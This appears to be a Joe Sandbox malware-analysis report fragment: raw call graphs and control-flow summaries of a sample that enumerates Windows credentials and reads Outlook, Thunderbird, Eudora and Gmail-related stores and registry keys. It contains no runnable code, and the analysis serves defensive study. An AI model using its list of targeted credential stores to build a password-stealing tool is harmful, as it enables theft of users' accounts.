33770->33764 33954 410a9c RegOpenKeyExA 33771->33954 33773 40823f 33774 403cc6 33773->33774 33775 408246 memset 33773->33775 33783 4086e0 33774->33783 33955 410b62 RegEnumKeyExA 33775->33955 33777 4082bf RegCloseKey 33777->33774 33779 40826f 33779->33777 33956 410a9c RegOpenKeyExA 33779->33956 33957 4080ed 11 API calls 33779->33957 33958 410b62 RegEnumKeyExA 33779->33958 33782 4082a2 RegCloseKey 33782->33779 33959 4045db 33783->33959 33786 4088ef 33967 404656 33786->33967 33788 40872d 33788->33786 33791 408737 wcslen 33788->33791 33790 40872b CredEnumerateW 33790->33788 33791->33786 33797 40876a 33791->33797 33792 40877a _wcsncoll 33792->33797 33794 404734 3 API calls 33794->33797 33795 404785 FreeLibrary 33795->33797 33796 408812 memset 33796->33797 33798 40883c memcpy wcschr 33796->33798 33797->33786 33797->33792 33797->33794 33797->33795 33797->33796 33797->33798 33799 4088c3 LocalFree 33797->33799 33970 40466b _mbscpy 33797->33970 33798->33797 33799->33797 33800 410a9c RegOpenKeyExA 33800->33679 33801->33683 33971 410a9c RegOpenKeyExA 33802->33971 33804 402c7a 33805 402da5 33804->33805 33806 402c87 memset 33804->33806 33805->33688 33972 410b62 RegEnumKeyExA 33806->33972 33808 402d9c RegCloseKey 33808->33805 33809 402cb2 33809->33808 33810 410b1e 3 API calls 33809->33810 33819 402d9a 33809->33819 33976 402bd1 39 API calls 33809->33976 33977 410b62 RegEnumKeyExA 33809->33977 33811 402ce4 memset sprintf 33810->33811 33973 410a9c RegOpenKeyExA 33811->33973 33813 402d28 33814 402d3a sprintf 33813->33814 33974 402bd1 39 API calls 33813->33974 33975 410a9c RegOpenKeyExA 33814->33975 33819->33808 33820->33691 33821->33695 33822->33699 33824 410816 33823->33824 33825 4107f1 FreeLibrary 33824->33825 33826 403ddd 33825->33826 33826->33704 33978 410a9c RegOpenKeyExA 33827->33978 33829 402ff9 33830 403006 memset 33829->33830 33831 40312c 33829->33831 33979 410b62 RegEnumKeyExA 33830->33979 33831->33708 33833 403122 RegCloseKey 33833->33831 33834 410b1e 3 API calls 33835 403058 memset sprintf 33834->33835 33980 410a9c RegOpenKeyExA 33835->33980 33837 4030a2 memset 33981 410b62 RegEnumKeyExA 33837->33981 33838 410b62 RegEnumKeyExA 33842 403033 33838->33842 33840 4030f9 RegCloseKey 33840->33842 33842->33833 33842->33834 33842->33837 33842->33838 33842->33840 33982 402db3 26 API calls 33842->33982 33844 4032d5 33843->33844 33845 4033a9 33843->33845 33983 4021b6 memset 33844->33983 33858 4034e4 memset memset 33845->33858 33847 4032e1 33984 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33847->33984 33849 4032ea 33850 4032f8 memset GetPrivateProfileSectionA 33849->33850 33985 4023e5 16 API calls 33849->33985 33850->33845 33855 40332f 33850->33855 33852 40339b strlen 33852->33845 33852->33855 33854 403350 strchr 33854->33855 33855->33845 33855->33852 33986 4021b6 memset 33855->33986 33987 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33855->33987 33988 4023e5 16 API calls 33855->33988 33859 410b1e 3 API calls 33858->33859 33860 40353f 33859->33860 33861 40357f 33860->33861 33862 403546 _mbscpy 33860->33862 33866 403985 33861->33866 33989 406d55 strlen _mbscat 33862->33989 33864 403565 _mbscat 33990 4033f0 19 API calls 33864->33990 33991 40466b _mbscpy 33866->33991 33870 4039aa 33872 4039ff 33870->33872 33992 40f460 memset memset 33870->33992 34013 40f6e2 33870->34013 34029 4038e8 21 API calls 33870->34029 33873 404785 FreeLibrary 33872->33873 33874 403a0b 33873->33874 33875 4037ca memset memset 33874->33875 34037 444551 memset 33875->34037 33877 4038e2 33877->33718 33941 40f334 334 API calls 33877->33941 33880 40382e 33881 406f06 2 API calls 33880->33881 33882 403843 33881->33882 33883 406f06 2 API calls 33882->33883 33884 403855 strchr 33883->33884 33885 403884 _mbscpy 33884->33885 33886 403897 strlen 33884->33886 33887 4038bf _mbscpy 33885->33887 33886->33887 33888 4038a4 sprintf 33886->33888 34049 4023e5 16 API calls 33887->34049 33888->33887 33891 44b090 33890->33891 33892 40fb10 RegOpenKeyExA 33891->33892 33893 403e7f 33892->33893 33894 40fb3b RegOpenKeyExA 33892->33894 33904 40f96c 33893->33904 33895 40fb55 RegQueryValueExA 33894->33895 33896 40fc2d RegCloseKey 33894->33896 33897 40fc23 RegCloseKey 33895->33897 33898 40fb84 33895->33898 33896->33893 33897->33896 33899 404734 3 API calls 33898->33899 33900 40fb91 33899->33900 33900->33897 33901 40fc19 LocalFree 33900->33901 33902 40fbdd memcpy memcpy 33900->33902 33901->33897 34054 40f802 11 API calls 33902->34054 33905 4070ae GetVersionExA 33904->33905 33906 40f98d 33905->33906 33907 4045db 7 API calls 33906->33907 33915 40f9a9 33907->33915 33908 40fae6 33909 404656 FreeLibrary 33908->33909 33910 403e85 33909->33910 33916 4442ea memset 33910->33916 33911 40fa13 memset WideCharToMultiByte 33912 40fa43 _strnicmp 33911->33912 33911->33915 33913 40fa5b WideCharToMultiByte 33912->33913 33912->33915 33914 40fa88 WideCharToMultiByte 33913->33914 33913->33915 33914->33915 33915->33908 33915->33911 33917 410dbb 9 API calls 33916->33917 33918 444329 33917->33918 34055 40759e strlen strlen 33918->34055 33923 410dbb 9 API calls 33924 444350 33923->33924 33925 40759e 3 API calls 33924->33925 33926 44435a 33925->33926 33927 444212 65 API calls 33926->33927 33928 444366 memset memset 33927->33928 33929 410b1e 3 API calls 33928->33929 33930 4443b9 ExpandEnvironmentStringsA strlen 33929->33930 33931 4443f4 _strcmpi 33930->33931 33932 4443e5 33930->33932 33933 403e91 33931->33933 33934 44440c 33931->33934 33932->33931 33933->33509 33935 444212 65 API calls 33934->33935 33935->33933 33936->33680 33937->33684 33938->33692 33939->33696 33940->33700 33941->33718 33942->33720 33943->33745 33944->33749 33945->33742 33947 40841c 33946->33947 33948 410a9c RegOpenKeyExA 33947->33948 33948->33758 33949->33764 33950->33764 33951->33768 33952->33770 33953->33764 33954->33773 33955->33779 33956->33779 33957->33782 33958->33779 33960 404656 FreeLibrary 33959->33960 33961 4045e3 LoadLibraryA 33960->33961 33962 404651 33961->33962 33963 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33961->33963 33962->33786 33962->33788 33962->33790 33964 40463d 33963->33964 33965 404643 33964->33965 33966 404656 FreeLibrary 33964->33966 33965->33962 33966->33962 33968 403cd2 33967->33968 33969 40465c FreeLibrary 33967->33969 33968->33800 33969->33968 33970->33797 33971->33804 33972->33809 33973->33813 33974->33814 33975->33809 33976->33809 33977->33809 33978->33829 33979->33842 33980->33842 33981->33842 33982->33842 33983->33847 33984->33849 33985->33850 33986->33854 33987->33855 33988->33855 33989->33864 33990->33861 33991->33870 34030 4078ba 33992->34030 33995 4078ba _mbsnbcat 33996 40f5a3 RegOpenKeyExA 33995->33996 33997 40f5c3 RegQueryValueExA 33996->33997 33998 40f6d9 33996->33998 33999 40f6d0 RegCloseKey 33997->33999 34000 40f5f0 33997->34000 33998->33870 33999->33998 34000->33999 34001 40f675 34000->34001 34034 40466b _mbscpy 34000->34034 34001->33999 34035 4012ee strlen 34001->34035 34003 40f611 34005 404734 3 API calls 34003->34005 34010 40f616 34005->34010 34006 40f69e RegQueryValueExA 34006->33999 34007 40f6c1 34006->34007 34007->33999 34008 40f66a 34009 404785 FreeLibrary 34008->34009 34009->34001 34010->34008 34011 40f661 LocalFree 34010->34011 34012 40f645 memcpy 34010->34012 34011->34008 34012->34011 34036 40466b _mbscpy 34013->34036 34015 40f6fa 34016 4045db 7 API calls 34015->34016 34017 40f708 34016->34017 34018 404734 3 API calls 34017->34018 34023 40f7e2 34017->34023 34024 40f715 34018->34024 34019 404656 FreeLibrary 34020 40f7f1 34019->34020 34021 404785 FreeLibrary 34020->34021 34022 40f7fc 34021->34022 34022->33870 34023->34019 34024->34023 34025 40f797 WideCharToMultiByte 34024->34025 34026 40f7b8 strlen 34025->34026 34027 40f7d9 LocalFree 34025->34027 34026->34027 34028 40f7c8 _mbscpy 34026->34028 34027->34023 34028->34027 34029->33870 34031 4078e6 34030->34031 34032 4078c7 _mbsnbcat 34031->34032 34033 4078ea 34031->34033 34032->34031 34033->33995 34034->34003 34035->34006 34036->34015 34050 410a9c RegOpenKeyExA 34037->34050 34039 40381a 34039->33877 34048 4021b6 memset 34039->34048 34040 44458b 34040->34039 34051 410add RegQueryValueExA 34040->34051 34042 4445a4 34043 4445dc RegCloseKey 34042->34043 34052 410add RegQueryValueExA 34042->34052 34043->34039 34045 4445c1 34045->34043 34053 444879 30 API calls 34045->34053 34047 4445da 34047->34043 34048->33880 34049->33877 34050->34040 34051->34042 34052->34045 34053->34047 34054->33901 34056 4075c9 34055->34056 34057 4075bb _mbscat 34055->34057 34058 444212 34056->34058 34057->34056 34075 407e9d 34058->34075 34061 44424d 34062 444274 34061->34062 34063 444258 34061->34063 34083 407ef8 34061->34083 34064 407e9d 9 API calls 34062->34064 34100 444196 52 API calls 34063->34100 34071 4442a0 34064->34071 34066 407ef8 9 API calls 34066->34071 34067 4442ce 34097 407f90 34067->34097 34071->34066 34071->34067 34073 444212 65 API calls 34071->34073 34093 407e62 34071->34093 34072 407f90 FindClose 34074 4442e4 34072->34074 34073->34071 34074->33923 34076 407f90 FindClose 34075->34076 34077 407eaa 34076->34077 34078 406f06 2 API calls 34077->34078 34079 407ebd strlen strlen 34078->34079 34080 407ee1 34079->34080 34081 407eea 34079->34081 34101 4070e3 strlen _mbscat _mbscpy _mbscat 34080->34101 34081->34061 34084 407f03 FindFirstFileA 34083->34084 34085 407f24 FindNextFileA 34083->34085 34086 407f3f 34084->34086 34087 407f46 strlen strlen 34085->34087 34088 407f3a 34085->34088 34086->34087 34090 407f7f 34086->34090 34087->34090 34091 407f76 34087->34091 34089 407f90 FindClose 34088->34089 34089->34086 34090->34061 34102 4070e3 strlen _mbscat _mbscpy _mbscat 34091->34102 34094 407e6c strcmp 34093->34094 34096 407e94 34093->34096 34095 407e83 strcmp 34094->34095 34094->34096 34095->34096 34096->34071 34098 407fa3 34097->34098 34099 407f99 FindClose 34097->34099 34098->34072 34099->34098 34100->34061 34101->34081 34102->34090 34103->33523 34104->33527 34105->33533 34106->33535 34107->33540 34108->33537 34109->33532 34118 411853 RtlInitializeCriticalSection memset 34119 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34292 40a256 13 API calls 34294 432e5b 17 API calls 34296 43fa5a 20 API calls 34121 401060 41 API calls 34299 427260 CloseHandle memset memset 33197 410c68 FindResourceA 33198 410c81 SizeofResource 33197->33198 33200 410cae 33197->33200 33199 410c92 LoadResource 33198->33199 33198->33200 33199->33200 33201 410ca0 LockResource 33199->33201 33201->33200 34301 405e69 14 API calls 34126 433068 15 API calls __fprintf_l 34303 414a6d 18 API calls 34304 43fe6f 134 API calls 34128 424c6d 15 API calls __fprintf_l 34305 426741 19 API calls 34130 440c70 17 API calls 34131 443c71 44 API calls 34134 427c79 24 API calls 34308 416e7e memset __fprintf_l 34138 42800b 47 API calls 34139 425115 85 API calls __fprintf_l 34311 41960c 61 API calls 34140 43f40c 122 API calls __fprintf_l 34143 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34144 43f81a 20 API calls 34146 414c20 memset memset 34147 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34315 414625 18 API calls 34316 404225 modf 34317 403a26 strlen WriteFile 34319 40422a 12 API calls 34323 427632 memset memset memcpy 34324 40ca30 59 API calls 34325 404235 26 API calls 34148 42ec34 61 API calls __fprintf_l 34149 425115 76 API calls __fprintf_l 34326 425115 77 API calls __fprintf_l 34328 44223a 38 API calls 34155 43183c 112 API calls 34329 44b2c5 _onexit __dllonexit 34334 42a6d2 memcpy __allrem 34157 405cda 65 API calls 34342 43fedc 138 API calls 34343 4116e1 16 API calls __fprintf_l 34160 4244e6 19 API calls 34162 42e8e8 127 API calls __fprintf_l 34163 4118ee RtlLeaveCriticalSection 34348 43f6ec 22 API calls 34165 425115 119 API calls __fprintf_l 33187 410cf3 EnumResourceNamesA 34351 4492f0 memcpy memcpy 34353 43fafa 18 API calls 34355 4342f9 15 API calls __fprintf_l 34166 4144fd 19 API calls 34357 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34358 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34361 443a84 _mbscpy 34363 43f681 17 API calls 34169 404487 22 API calls 34365 415e8c 16 API calls __fprintf_l 34173 411893 RtlDeleteCriticalSection __fprintf_l 34174 41a492 42 API calls 34369 403e96 34 API calls 34370 410e98 memset SHGetPathFromIDList SendMessageA 34176 426741 109 API calls __fprintf_l 34177 4344a2 18 API calls 34178 4094a2 10 API calls 34373 4116a6 15 API calls __fprintf_l 34374 43f6a4 17 API calls 34375 440aa3 20 API calls 34377 427430 45 API calls 34181 4090b0 7 API calls 34182 4148b0 15 API calls 34184 4118b4 RtlEnterCriticalSection 34185 4014b7 CreateWindowExA 34186 40c8b8 19 API calls 34188 4118bf RtlTryEnterCriticalSection 34382 42434a 18 API calls __fprintf_l 34384 405f53 12 API calls 34196 43f956 59 API calls 34198 40955a 17 API calls 34199 428561 36 API calls 34200 409164 7 API calls 34388 404366 19 API calls 34392 40176c ExitProcess 34395 410777 42 API calls 34205 40dd7b 51 API calls 34206 425d7c 16 API calls __fprintf_l 34397 43f6f0 25 API calls 34398 42db01 22 API calls 34207 412905 15 API calls __fprintf_l 34399 403b04 54 API calls 34400 405f04 SetDlgItemTextA GetDlgItemTextA 34401 44b301 ??3@YAXPAX 34404 4120ea 14 API calls 3 library calls 34405 40bb0a 8 API calls 34407 413f11 strcmp 34211 434110 17 API calls __fprintf_l 34214 425115 108 API calls __fprintf_l 34408 444b11 _onexit 34216 425115 76 API calls __fprintf_l 34219 429d19 10 API calls 34411 444b1f __dllonexit 34412 409f20 _strcmpi 34221 42b927 31 API calls 34415 433f26 19 API calls __fprintf_l 34416 44b323 FreeLibrary 34417 427f25 46 API calls 34418 43ff2b 17 API calls 34419 43fb30 19 API calls 34228 414d36 16 API calls 34230 40ad38 7 API calls 34421 433b38 16 API calls __fprintf_l 34422 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34234 426741 21 API calls 34235 40c5c3 125 API calls 34237 43fdc5 17 API calls 34423 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34240 4161cb memcpy memcpy memcpy memcpy 33202 44b3cf 33203 44b3e6 33202->33203 33205 44b454 33202->33205 33203->33205 33209 44b40e 33203->33209 33206 44b405 33206->33205 33207 44b435 VirtualProtect 33206->33207 33207->33205 33208 44b444 VirtualProtect 33207->33208 33208->33205 33210 44b413 33209->33210 33212 44b454 33210->33212 33216 44b42b 33210->33216 33213 44b41c 33213->33212 33214 44b435 VirtualProtect 33213->33214 33214->33212 33215 44b444 VirtualProtect 33214->33215 33215->33212 33217 44b431 33216->33217 33218 44b435 VirtualProtect 33217->33218 33220 44b454 33217->33220 33219 44b444 VirtualProtect 33218->33219 33218->33220 33219->33220 34428 43ffc8 18 API calls 34241 4281cc 15 API calls __fprintf_l 34430 4383cc 110 API calls __fprintf_l 34242 4275d3 41 API calls 34431 4153d3 22 API calls __fprintf_l 34243 444dd7 _XcptFilter 34436 4013de 15 API calls 34438 425115 111 API calls __fprintf_l 34439 43f7db 18 API calls 34442 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34245 4335ee 16 API calls __fprintf_l 34444 429fef 11 API calls 34246 444deb _exit _c_exit 34445 40bbf0 138 API calls 34249 425115 79 API calls __fprintf_l 34449 437ffa 22 API calls 34253 4021ff 14 API calls 34254 43f5fc 149 API calls 34450 40e381 9 API calls 34256 405983 40 API calls 34257 42b186 27 API calls __fprintf_l 34258 427d86 76 API calls 34259 403585 20 API calls 34261 42e58e 18 API calls __fprintf_l 34264 425115 75 API calls __fprintf_l 34266 401592 8 API calls 33188 410b92 33191 410a6b 33188->33191 33190 410bb2 33192 410a77 33191->33192 33193 410a89 GetPrivateProfileIntA 33191->33193 33196 410983 memset _itoa WritePrivateProfileStringA 33192->33196 33193->33190 33195 410a84 33195->33190 33196->33195 34454 434395 16 API calls 34268 441d9c memcmp 34456 43f79b 119 API calls 34269 40c599 43 API calls 34457 426741 87 API calls 34273 4401a6 21 API calls 34275 426da6 memcpy memset memset memcpy 34276 4335a5 15 API calls 34278 4299ab memset memset memcpy memset memset 34279 40b1ab 8 API calls 34462 425115 76 API calls __fprintf_l 34466 4113b2 18 API calls 2 library calls 34470 40a3b8 memset sprintf SendMessageA 33221 410bbc 33224 4109cf 33221->33224 33225 4109dc 33224->33225 33226 410a23 memset GetPrivateProfileStringA 33225->33226 33227 4109ea memset 33225->33227 33232 407646 strlen 33226->33232 33237 4075cd sprintf memcpy 33227->33237 33230 410a0c WritePrivateProfileStringA 33231 410a65 33230->33231 33233 40765a 33232->33233 33235 40765c 33232->33235 33233->33231 33234 4076a3 33234->33231 33235->33234 33238 40737c strtoul 33235->33238 33237->33230 33238->33235 34281 40b5bf memset memset _mbsicmp

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                  APIs
                  • memset.MSVCRT ref: 0040832F
                  • memset.MSVCRT ref: 00408343
                  • memset.MSVCRT ref: 0040835F
                  • memset.MSVCRT ref: 00408376
                  • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                  • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                  • strlen.MSVCRT ref: 004083E9
                  • strlen.MSVCRT ref: 004083F8
                  • memcpy.MSVCRT ref: 0040840A
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                  • String ID: 5$H$O$b$i$}$}
                  • API String ID: 1832431107-3760989150
                  • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                  • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                  • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                  • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 443 407ef8-407f01 444 407f03-407f22 FindFirstFileA 443->444 445 407f24-407f38 FindNextFileA 443->445 446 407f3f-407f44 444->446 447 407f46-407f74 strlen * 2 445->447 448 407f3a call 407f90 445->448 446->447 450 407f89-407f8f 446->450 451 407f83 447->451 452 407f76-407f81 call 4070e3 447->452 448->446 454 407f86-407f88 451->454 452->454 454->450
                  APIs
                  • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                  • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                  • strlen.MSVCRT ref: 00407F5C
                  • strlen.MSVCRT ref: 00407F64
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileFindstrlen$FirstNext
                  • String ID: ACD
                  • API String ID: 379999529-620537770
                  • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                  • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                  • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                  • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 00401E8B
                  • strlen.MSVCRT ref: 00401EA4
                  • strlen.MSVCRT ref: 00401EB2
                  • strlen.MSVCRT ref: 00401EF8
                  • strlen.MSVCRT ref: 00401F06
                  • memset.MSVCRT ref: 00401FB1
                  • atoi.MSVCRT ref: 00401FE0
                  • memset.MSVCRT ref: 00402003
                  • sprintf.MSVCRT ref: 00402030
                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                  • memset.MSVCRT ref: 00402086
                  • memset.MSVCRT ref: 0040209B
                  • strlen.MSVCRT ref: 004020A1
                  • strlen.MSVCRT ref: 004020AF
                  • strlen.MSVCRT ref: 004020E2
                  • strlen.MSVCRT ref: 004020F0
                  • memset.MSVCRT ref: 00402018
                    • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                  • _mbscpy.MSVCRT ref: 00402177
                  • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                  • API String ID: 1846531875-4223776976
                  • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                  • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                  • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                  • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                    • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                    • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                    • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                  • DeleteObject.GDI32(?), ref: 0040D1A6
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                  • API String ID: 745651260-375988210
                  • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                  • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                  • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                  • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                  Control-flow Graph

                  APIs
                    • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                  • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                  • _mbscpy.MSVCRT ref: 00403E54
                  Strings
                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                  • pstorec.dll, xrefs: 00403C30
                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                  • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                  • PStoreCreateInstance, xrefs: 00403C44
                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                  • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                  • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadProc_mbscpy
                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                  • API String ID: 1197458902-317895162
                  • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                  • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                  • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                  • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 236 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->236 235->234 237 444c75-444c7e 235->237 246 444d02-444d0d __setusermatherr 236->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 236->247 238 444c80-444c85 237->238 239 444c9f-444ca3 237->239 238->234 241 444c8c-444c93 238->241 239->234 242 444ca5-444ca7 239->242 241->234 244 444c95-444c9d 241->244 245 444cad-444cb0 242->245 244->245 245->236 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 252 444d81-444d85 250->252 253 444da9-444dad 250->253 254 444d74-444d76 251->254 255 444d78-444d7b 251->255 257 444d87-444d89 252->257 258 444d8b-444d9c GetStartupInfoA 252->258 253->250 254->251 254->255 255->252 256 444d7d-444d7e 255->256 256->252 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.1833633512.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                  Similarity
                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                  • String ID: kGu
                  • API String ID: 3662548030-4035606982
                  • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                  • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                  • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                  • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                  Control-flow Graph

                  • Executed
                  • Not Executed
